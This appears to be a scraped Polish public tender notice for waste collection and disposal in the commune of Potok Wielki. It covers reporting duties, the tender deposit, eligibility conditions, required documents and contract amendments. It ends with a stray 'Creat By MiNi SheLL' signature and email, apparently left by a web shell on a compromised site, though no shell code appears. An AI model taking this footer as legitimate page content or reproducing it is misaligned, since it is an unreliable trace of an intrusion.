1)	Wykonawca jest zobowiązany do przedkładania Zamawiającemu comiesięcznych raportów, najpóźniej do 10 dni po upływie miesiąca, którego raport dotyczy, zawierających informacje o ilości, wielkości i miejscu opróżnionych pojemników z odpadami zmieszanymi i segregowanymi, ilości odebranych worków z odpadami segregowanymi z nieruchomości zamieszkałych na terenie gminy Potok Wielki w tym także odpadów zebranych w ramach zbiórki okresowej. Raport będzie zawierał także informacje o ilości worków dostarczonych właścicielom nieruchomości w danym miesiącu.
2)	Wykonawca jest zobowiązany do sporządzania i przekazywania Zamawiającemu comiesięcznych sprawozdań dotyczących masy poszczególnych rodzajów odpadów przekazanych do instalacji zagospodarowania odpadów, wraz z kartami ich przekazania i fakturami poświadczonymi za zgodność z oryginałem. Dokumenty te Wykonawca zobowiązany jest przekazać najpóźniej 14 dni po upływie miesiąca, którego sprawozdanie dotyczy. 
3)	Wykonawca zobowiązany jest do przedkładania Zamawiającemu kwartalnych sprawozdań zgodnych z art. 9n ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. 2012 r. poz. 391 z późn. zm.).
4)	Wykonawca zainstaluje w terminie siedmiu dni od podpisania umowy na wskazanym przez Zamawiającego stanowisku komputerowym, oprogramowanie pozwalające na bieżący odczyt monitoringu z GPS oraz dostęp do archiwalnych danych. 		
5)	Wykonawca zobowiązuje się do przestrzegania zasad poufności co do informacji pozyskanych w związku z realizacją Umowy, w szczególności do przestrzegania przepisów dotyczących ochrony danych osobowych, w tym należytego zabezpieczenia i ochrony tych danych. Wykonawca nie może wykorzystywać pozyskanych danych w żaden inny sposób lub w innym celu niż do wykonywania umowy, w szczególności zakazuje się wykorzystywania danych w celach reklamowych lub marketingowych. 
6)	Wykonawca przekaże Zamawiającemu wykaz pojemników dostarczonych właścicielom nieruchomości wraz z potwierdzeniem odbioru. 
18.	Wykonawca obowiązany jest do odbierania odpadów komunalnych w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności do:
1)	zapobiegania wysypywaniu się odpadów z pojemników i worków podczas
dokonywania odbioru,
2)	uprzątnięcia i odbierania odpadów z miejsc ich gromadzenia, w tym także tych odpadów, które nie zostały umieszczone w pojemnikach.	
19.	Wykonawcę obowiązuje: 					
1)	zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości, 
2)	zabezpieczenie przewożonych odpadów przed wysypywaniem w trakcie transportu, w przypadku wysypywania się odpadów Wykonawca zobowiązany jest do natychmiastowego uprzątnięcia odpadów oraz skutków ich wysypywania (zabrudzeń, plam itd.), 
3)	zapewnienia odpowiedniego stanu sanitarnego (mycie i dezynfekcja) pojazdów używanych do realizacji zamówienia. 					
4)	Wykonawca winien dysponować sprzętem umożliwiającym odbiór odpadów komunalnych z nieruchomości położonych przy drogach nie spełniających parametrów dróg publicznych.
5)	Wykonawcę obowiązuje poddanie się doraźnej kontroli Zamawiającego, również poprzez ważenie środka transportu przeznaczonego do odbioru odpadów komunalnych z terenu gminy Potok Wielki przed rozpoczęciem zbiórki odpadów na terenie gminy oraz po jej zakończeniu przed przekazaniem odpadów do instalacji do przetwarzania odpadów. 					     
6)	Wykonawca jest zobowiązany do zapewnienia nałożonych na Zamawiającego poziomów odzysku, określonych w:				
a)	rozporządzeniu Ministra Środowiska z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645),
b)	rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 roku w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z 2012 r. poz. 676). 
20.	Warunki wykonania zamówienia zawarte są we projekcie umowy stanowiącym załącznik nr 8 do SIWZ.	
21.	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgodnione będą przez Zamawiającego z ustanowionym przedstawicielem wykonawcy. 
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 5 000, słownie: pięć tysięcy złotych.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy: 
71 9410 1049 2005 5000 0329 0003 BS Janów Lubelski Oddział Potok Wielki z adnotacją: wadium - Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych, położonych na terenie gminy Potok Wielki 
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) w terminie 2013-07-11, sposób przekazania: osobiście
4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy:
BS Janów Lubelski Oddział Potok nr rachunku: 71 9410 1049 2005 5000 0329 0003 z adnotacją: wadium na: Odbiór i zagospodarowanie odpadów komunalnych 
z nieruchomości zamieszkanych, położonych na terenie gminy Potok Wielki.
5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6. Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego.
7. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie.
9. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela.
10. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
11. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
12. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy.
13. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
15. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:
a) Posiada wpis do rejestru działalności regulowanej prowadzony przez Wójta Gminy Potok Wielki w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wydany na podstawie ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2012 r. poz. 391 z późn. zm.).
b) Posiada aktualne zezwolenie na prowadzenie działalności w zakresie transportu 
i zbierania odpadów komunalnych wydane przez właściwy organ zgodnie z ustawą 
z dnia 14 grudnia 2012 r. o odpadach (t.j. Dz. U. z 2013 r, poz. 21).

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:
a) Wymagane jest wykazanie przez wykonawcę, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną usługę polegającą na odbiorze, transporcie i zagospodarowaniu odpadów komunalnych na rzecz właścicieli nieruchomości w sposób ciągły przez okres nie krótszy niż 12 kolejnych miesięcy, o łącznej masie odebranych odpadów nie mniej niż 300 Mg. Masa odebranych odpadów może być łączona z kilku gmin.

Zamawiający wymaga przedłożenia wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług (według załącznika nr 6) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegających na odbiorze, transporcie i zagospodarowaniu odpadów komunalnych na rzecz właścicieli nieruchomości, z podaniem danych wykazanych w załączniku nr 6. W wykazie tym musi być wykazana usługa, która potwierdzi spełnienie ww. warunku udziału w zakresie wiedzy związane z przedmiotem niniejszego zamówienia, które Wykonawca wykonał, wykonuje (§ 1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich Zamawiający może żądać od Wykonawcy, oraz form w jakich te dokumenty mogą być składane). 

Dowodami o których mowa powyżej są: 
Poświadczenie Wójta Gminy lub Burmistrza Miasta w których były świadczone usługi, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie musi być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia o którym mowa powyżej - oświadczenie Wykonawcy. 

b) W razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa powyżej, budzą wątpliwości Zamawiającego, lub gdy z poświadczenia albo innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający na etapie badania i oceny ofert, może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały być wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu. 
c) W niniejszym postępowaniu zastosowanie znajduje również zapis § 9 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane, (inne dokumenty w miejsce poświadczeń).

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że: 
a) dysponuje co najmniej: 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych, 2 pojazdami przystosowanymi do odbierania selektywnie zbieranych odpadów komunalnych, 1 pojazdem do odbierania odpadów bez funkcji kompaktującej. Pojazdy te muszą być trwale i czytelnie oznakowane w widocznym miejscu nazwą firmy oraz danymi teleadresowymi podmiotu odbierającego odpady komunale od właścicieli nieruchomości. 
Wszystkie wykazane pojazdy muszą być wyposażone w system monitoringu bazujący na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz system czujników zapisujących dane o miejscach wyładunku odpadów umożliwiający weryfikację tych danych. 

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca jest zobowiązany złożyć oświadczenie o spełnianiu warunków
określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010r. Nr 113, poz. 759 z późn. zm.) 

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że: 
a) Posiadają środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 250 000,00 złotych,
b) Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z odbiorem, transportem i zagospodarowaniem odpadów komunalnych na kwotę nie mniej niż 250 000,00 złotych.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty metodą warunku granicznego - spełnia/niespełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty, 2) Wykaz osób do kontaktów z zamawiającym, 3)  Pełnomocnictwo do
występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę
podpisuje pełnomocnik, 4) W przypadku konsorcjum pełnomocnictwo dokumentujące
ustanowienie pełnomocnika przez Wykonawców do reprezentowania ich w postępowaniu o
udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie
zamówienia publicznego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonywania nieistotnych zmian zawartej umowy w stosunku w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy.   
2.	Zamawiający przewiduje również następujące możliwości dokonania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1)	zmiana stawki i kwoty podatku VAT oraz wynagrodzenia brutto określonego w § 4,                       
2)	zmiana terminu realizacji przedmiotu zamówienia w przypadku:
a)	działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie,                                 
b)	zaistnienia niesprzyjających warunków atmosferycznych, uniemożliwiających wykonanie zamówienia,
c)	działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron.                                                             
3.	Zmiany  umowy  przewidziane  w  ust. 2 dopuszczalne są na następujących warunkach:                                                                                                                         ad pkt.1) -  stawka i kwota podatku VAT ulegną zmianie odpowiednio do przepisów prawa 
                  wprowadzających zmianę. Jeżeli zmiana ta powodować będzie zmianę kosztów
                  wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość 
                  zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego 
                  przez Wykonawcę;
ad pkt.2) 
    lit. a) - o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego 
                 działania,
    lit. b) - o czas trwania niesprzyjających warunków atmosferycznych,                                             
    lit. c) - o okres uniemożliwienia Wykonawcy wykonywania zamówienia.
4.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugpotokwielki.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Potok Wielki, Potok Wielki 117, 23-313 Potok Wielki, pok. nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2013 godzina 09:00, miejsce: Urząd Gminy Potok Wielki, Potok Wielki 117, 23-313 Potok Wielki, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 14.08.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com